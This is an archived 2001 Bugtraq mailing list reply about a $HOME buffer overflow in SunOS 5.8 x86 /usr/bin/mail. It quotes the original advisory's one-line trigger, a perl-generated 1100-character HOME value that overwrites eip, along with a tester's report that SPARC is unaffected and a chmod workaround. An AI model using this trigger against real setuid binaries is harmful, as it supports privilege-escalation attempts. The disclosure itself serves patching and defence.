Bugtraq mailing list archives
Re: $HOME buffer overflow in SunOS 5.8 x86
From: "Juergen P. Meier" <jpm () class de>
Date: Tue, 5 Jun 2001 15:33:05 +0200
On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
$HOME buffer overflow in SunOS 5.8 x86 Systems affected: SunOS 5.8 x86 have not tested on other OSes Risk: Medium Date: 4 June 2001 Details: HOME=`perl -e 'print "A"x1100'` ; export HOME mail a CTL-C eip gets smashed with 0x41414141.
0:jpmeier@sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME 0:jpmeier@sol:/home/jpmeier> mail a ^Cmail: Mail saved in dead.letter 1:jpmeier@sol:/home/jpmeier> uname -a SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10 also tried larger buffers. Solaris/sparc appears not vulnerable. Maybe its an x86 bug only
Workaround: chmod -s /usr/bin/mail Vendor status: Sun was informed on 29 May 2001 about /usr/bin/mail and shall release patches.
juergen -- Juergen P. Meier email: jpm () class de
Current thread:
- $HOME buffer overflow in SunOS 5.8 x86 Georgi Guninski (Jun 04)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Juergen P. Meier (Jun 05)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Gunnar Wolf (Jun 05)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Tohru Watanabe (Jun 05)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Patrick Finch (Jun 05)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Kris Kennaway (Jun 08)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Gunnar Wolf (Jun 05)
- <Possible follow-ups>
- Re: $HOME buffer overflow in SunOS 5.8 x86 SChoe (Jun 05)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Nicolas Dubee (Jun 05)
- Re: $HOME buffer overflow in SunOS 5.8 x86 Juergen P. Meier (Jun 05)